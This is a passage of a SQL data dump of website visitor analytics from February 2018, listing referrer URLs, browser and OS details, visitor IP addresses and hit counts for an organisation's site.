known','Unknown','Unknown','','173.252.124.232','000',1,0),(24584,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.27','000',8,0),(24585,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.198','000',1,0),(24586,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.204','000',2,0),(24587,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.196','000',1,0),(24588,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.105','000',2,0),(24589,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.129','000',1,0),(24590,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.215','000',2,0),(24591,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.181','000',1,0),(24592,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.151','000',3,0),(24593,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.118','000',2,0),(24594,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.43','000',1,0),(24595,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.20','000',2,0),(24596,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.74','000',1,0),(24597,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.236','000',1,0),(24598,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.83','000',1,0),(24599,'2018-02-24','https://zphiblgz.org/scholarship/recommendation/','Chrome','Windows','64.0.3282.167','','173.64.123.159','000',2,0),(24600,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.216','000',1,0),(24601,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.71','000',2,0),(24602,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.112','000',2,0),(24603,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.171','000',1,0),(24604,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.121','000',1,0),(24605,'2018-02-24','https://zphiblgz.org','Firefox','Windows','40.1','','85.73.180.85','000',2,0),(24606,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.87','000',1,0),(24607,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.88','000',2,0),(24608,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.24','000',2,0),(24609,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.84','000',5,0),(24610,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.225','000',2,0),(24611,'2018-02-24','https://zphiblgz.org','Safari','iPhone','11.0','','107.77.203.167','000',1,0),(24612,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.135','000',1,0),(24613,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.134','000',4,0),(24614,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.199','000',1,0),(24615,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.140','000',1,0),(24616,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.167','000',1,0),(24617,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.228','000',1,0),(24618,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.40','000',1,0),(24619,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.105','000',1,0),(24620,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.83','000',1,0),(24621,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.65','000',1,0),(24622,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.244','000',1,0),(24623,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.86','000',1,0),(24624,'2018-02-24','https://zphiblgz.org/','Safari','Macintosh','10.1.2','','173.44.230.245','000',1,0),(24625,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.12','000',1,0),(24626,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.247','000',3,0),(24627,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.214','000',3,0),(24628,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.54','000',2,0),(24629,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.219','000',2,0),(24630,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.249','000',1,0),(24631,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.123','000',1,0),(24632,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.116','000',1,0),(24633,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.119','000',1,0),(24634,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.74','000',2,0),(24635,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.15','000',1,0),(24636,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.220','000',2,0),(24637,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.113','000',1,0),(24638,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.189','000',2,0),(24639,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.198','000',2,0),(24640,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.113','000',1,0),(24641,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.29','000',1,0),(24642,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.76','000',3,0),(24643,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.229','000',1,0),(24644,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.124','000',1,0),(24645,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.124','000',3,0),(24646,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.245','000',1,0),(24647,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.121','000',1,0),(24648,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.57','000',2,0),(24649,'2018-02-24','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','50.31.10.156','000',5,0),(24650,'2018-02-24','https://zphiblgz.org','Opera','Windows','8.50','','50.31.10.156','000',1,0),(24651,'2018-02-24','https://zphiblgz.org','Safari','iPad','11.0','','71.121.163.58','000',2,0),(24652,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.228.116','000',2,0),(24653,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.246','000',1,0),(24654,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.185','000',1,0),(24655,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.153','000',1,0),(24656,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.142','000',2,0),(24657,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.30','000',2,0),(24658,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.144','000',1,0),(24659,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.104','000',2,0),(24660,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.116','000',2,0),(24661,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.230','000',2,0),(24662,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.85','000',1,0),(24663,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.75','000',3,0),(24664,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.212','000',3,0),(24665,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.205','000',1,0),(24666,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.203','000',2,0),(24667,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.119','000',1,0),(24668,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.90','000',2,0),(24669,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.216','000',3,0),(24670,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.193','000',4,0),(24671,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.198','000',1,0),(24672,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.81','000',1,0),(24673,'2018-02-24','https://zphiblgz.org','SamsungBrowser','Android','6.4','','73.200.189.209','000',2,0),(24674,'2018-02-24','https://www.google.com/','Chrome','Android','64.0.3282.137','','174.205.19.124','000',4,0),(24675,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.60','000',1,0),(24676,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.22','000',2,0),(24677,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.134','000',3,0),(24678,'2018-02-24','https://zphiblgz.org','Firefox','Windows','38.0','','54.144.195.124','000',1,0),(24679,'2018-02-24','https://zphiblgz.org','SamsungBrowser','Android','6.4','','76.100.49.102','000',3,0),(24680,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.216','000',2,0),(24681,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.72','000',1,0),(24682,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.22','000',3,0),(24683,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.42','000',1,0),(24684,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.113','000',1,0),(24685,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.9','000',1,0),(24686,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.211','000',2,0),(24687,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.213','000',1,0),(24688,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.23','000',1,0),(24689,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.88','000',1,0),(24690,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.145','000',1,0),(24691,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.114','000',3,0),(24692,'2018-02-24','http://transit.in.ua/','Opera','Windows','8.00','','46.118.116.121','000',1,0),(24693,'2018-02-24','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1707.u770qFjaTr5FToXVf3hchPEt4jnSvlijCPe0n58sYwHVwGlhpX_cmxwLAxdt1aQZ.b74aac01ec7448c238ab43db9085b86e57e4b2b7&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGv9iZwKiy-E54GYiollMFA&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29VM0RoOU1PZW9KUzV2X1hOR3dPOXhIZEYzczhobURkSmJ4WGVMM1I5bXpOcFUxVGJydzdsTkREUjZNM2xWT1U3QQ&b64e=2&sign=fad35bb1956fd2ca24f9274528333fc1&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQXbYQp9t5VF6V4dkypGWXOQ5CtLnUGfY5rBOtqJLXnbwZnoeM4xuFi-l0i1MbY25efD6b1aMXRpWO37t44z0MItrz87_-HW0aroJYrNO7s4hJeqa5qyR3kTZnP073dqMWJpbbCURl4ZA&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWQEYLqLDVCz1fB34fhAiyXQopTlySYxhSx77rkgWfcmXqTNwx4T5ztECqESwtKmxsUjHuf8K2S2A&l10n=ru&cts=1519498368849&mc=3.38446872051','MSIE','Windows','8.0','','5.3.236.133','000',1,0),(24694,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.168','000',4,0),(24695,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.156','000',3,0),(24696,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.246','000',1,0),(24697,'2018-02-24','https://zphiblgz.org','Safari','iPad','10.0','','72.83.3.119','000',3,0),(24698,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.115','000',1,0),(24699,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.208','000',1,0),(24700,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.194','000',2,0),(24701,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.133','000',3,0),(24702,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.222','000',1,0),(24703,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.252','000',3,0),(24704,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.142','000',1,0),(24705,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.217','000',1,0),(24706,'2018-02-24','http://doxyporno.com/','MSIE','Windows','6.0','','46.118.116.121','000',5,0),(24707,'2018-02-24','https://lm.facebook.com/','Chrome','Android','64.0.3282.137','','99.203.16.172','000',3,0),(24708,'2018-02-24','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',5,0),(24709,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.85','000',2,0),(24710,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.199','000',2,0),(24711,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.209','000',3,0),(24712,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.116','000',1,0),(24713,'2018-02-24','https://zphiblgz.org','Chrome','Android','64.0.3282.137','','99.203.16.121','000',2,0),(24714,'2018-02-24','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',1,0),(24715,'2018-02-24','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.29','000',1,0),(24716,'2018-02-24','https://zphiblgz.org','Safari','iPhone','11.0','','99.203.16.174','000',3,0),(24717,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.242','000',2,0),(24718,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.34','000',1,0),(24719,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.150','000',4,0),(24720,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.72','000',1,0),(24721,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.116','000',1,0),(24722,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.113','000',4,0),(24723,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.80','000',4,0),(24724,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.16','000',1,0),(24725,'2018-02-24','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.25.115','000',1,0),(24726,'2018-02-24','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.24.181','000',1,0),(24727,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.204','000',1,0),(24728,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.91','000',1,0),(24729,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.18','000',2,0),(24730,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.35','000',3,0),(24731,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.152','000',1,0),(24732,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.23','000',1,0),(24733,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.133','000',1,0),(24734,'2018-02-24','http://strady.org.ua/','MSIE','Windows','6.0','','134.249.66.84','000',3,0),(24735,'2018-02-24','https://zphiblgz.org','Safari','iPhone','11.0','','71.179.15.166','000',3,0),(24736,'2018-02-24','https://zphiblgz.org','Firefox','Linux','24.0','','71.179.15.166','000',8,0),(24737,'2018-02-24','https://zphiblgz.org','SamsungBrowser','Android','6.2','','71.179.15.166','000',11,0),(24738,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.121','000',2,0),(24739,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.85','000',2,0),(24740,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.37','000',1,0),(24741,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.216','000',3,0),(24742,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.215','000',1,0),(24743,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.220','000',1,0),(24744,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.5','000',1,0),(24745,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.146','000',1,0),(24746,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.1','000',1,0),(24747,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.148','000',2,0),(24748,'2018-02-24','https://zphiblgz.org','Safari','iPad','10.0','','71.179.15.166','000',3,0),(24749,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.118','000',3,0),(24750,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.185','000',2,0),(24751,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.224','000',1,0),(24752,'2018-02-24','https://www.google.com/','Firefox','Windows','52.0','','67.84.64.227','000',2,0),(24753,'2018-02-24','https://zphiblgz.org/','Safari','iPhone','11.0','','99.203.17.206','000',2,0),(24754,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.82','000',2,0),(24755,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.212','000',2,0),(24756,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.112','000',1,0),(24757,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.10','000',1,0),(24758,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.101','000',1,0),(24759,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.186','000',1,0),(24760,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.142','000',1,0),(24761,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.113','000',1,0),(24762,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.114','000',1,0),(24763,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.141','000',2,0),(24764,'2018-02-24','https://zphiblgz.org','Safari','Macintosh','8.0','','54.85.182.120','000',1,0),(24765,'2018-02-24','https://zphiblgz.org','Firefox','Windows','40.1','','49.244.65.253','000',2,0),(24766,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.11','000',3,0),(24767,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.12','000',1,0),(24768,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.201','000',2,0),(24769,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.228.118','000',2,0),(24770,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.208','000',1,0),(24771,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.180','000',1,0),(24772,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.250','000',1,0),(24773,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.243','000',1,0),(24774,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.101','000',2,0),(24775,'2018-02-24','https://zphiblgz.org','SamsungBrowser','Android','6.4','','98.117.43.158','000',2,0),(24776,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.197','000',1,0),(24777,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.54','000',1,0),(24778,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.211','000',1,0),(24779,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.5','000',3,0),(24780,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.168','000',2,0),(24781,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.176','000',1,0),(24782,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.128','000',1,0),(24783,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.200','000',1,0),(24784,'2018-02-24','https://zphiblgz.org','SamsungBrowser','Android','6.4','','96.255.12.223','000',2,0),(24785,'2018-02-24','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.29','000',1,0),(24786,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.208','000',2,0),(24787,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.64','000',1,0),(24788,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.27','000',2,0),(24789,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.19','000',1,0),(24790,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.50','000',1,0),(24791,'2018-02-24','https://happysong.ru/','Opera','Windows','9.0','','178.159.37.55','000',3,0),(24792,'2018-02-24','https://zphiblgz.org','Firefox','Windows','40.1','','86.16.218.46','000',2,0),(24793,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.214','000',2,0),(24794,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.128','000',1,0),(24795,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.74','000',1,0),(24796,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.31','000',2,0),(24797,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.130','000',2,0),(24798,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.170','000',2,0),(24799,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.131','000',1,0),(24800,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.195','000',1,0),(24801,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.23','000',1,0),(24802,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.86','000',1,0),(24803,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.112','000',3,0),(24804,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.214','000',1,0),(24805,'2018-02-24','https://zphiblgz.org','Safari','iPhone','11.0','','174.204.3.168','000',3,0),(24806,'2018-02-24','https://www.google.com/','Chrome','Windows','63.0.3239.132','','174.61.96.236','000',2,0),(24807,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.132','000',2,0),(24808,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.160','000',2,0),(24809,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.186','000',1,0),(24810,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.192','000',1,0),(24811,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.231','000',1,0),(24812,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.137','000',1,0),(24813,'2018-02-24','https://zphiblgz.org','Safari','iPhone','11.0','','174.200.21.235','000',3,0),(24814,'2018-02-24','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(24815,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.55','000',1,0),(24816,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.116','000',1,0),(24817,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.113','000',1,0),(24818,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.85','000',3,0),(24819,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.213','000',1,0),(24820,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.19','000',3,0),(24821,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.16','000',3,0),(24822,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.194','000',1,0),(24823,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.196','000',1,0),(24824,'2018-02-24','https://zphiblgz.org','Safari','Windows','4.0.5','','151.80.140.233','000',1,0),(24825,'2018-02-24','https://zphiblgz.org','Safari','iPad','3.0.5','','84.95.87.84','000',1,0),(24826,'2018-02-24','https://zphiblgz.org','Safari','Windows','5.0.5','','151.80.140.233','000',1,0),(24827,'2018-02-24','http://www.google.com/search','Chrome','Linux','41.0.2272.118','','66.102.7.187','000',2,0),(24828,'2018-02-24','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.28','000',1,0),(24829,'2018-02-24','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.31','000',1,0),(24830,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.7','000',2,0),(24831,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.126','000',1,0),(24832,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.48','000',1,0),(24833,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.86','000',1,0),(24834,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.205','000',2,0),(24835,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.163','000',1,0),(24836,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.100','000',1,0),(24837,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.203','000',1,0),(24838,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.58','000',1,0),(24839,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.99','000',1,0),(24840,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.20','000',3,0),(24841,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.164','000',1,0),(24842,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.224','000',1,0),(24843,'2018-02-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.202','000',1,0),(24844,'2018-02-24','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.32','000',1,0),(24845,'2018-02-24','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.30','000',1,0),(24846,'2018-02-24','https://zphiblgz.org','Firefox','Windows','40.1','','197.232.61.247','000',2,0),(24847,'2018-02-25','https://zphiblgz.org','Firefox','Linux','3.6.4','','188.165.233.228','000',46,0),(24848,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.112','000',3,0),(24849,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.120','000',3,0),(24850,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.40','000',2,0),(24851,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.196','000',2,0),(24852,'2018-02-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.192','000',1,0),(24853,'2018-02-25','https://zphiblgz.org','Unknown','Unknown',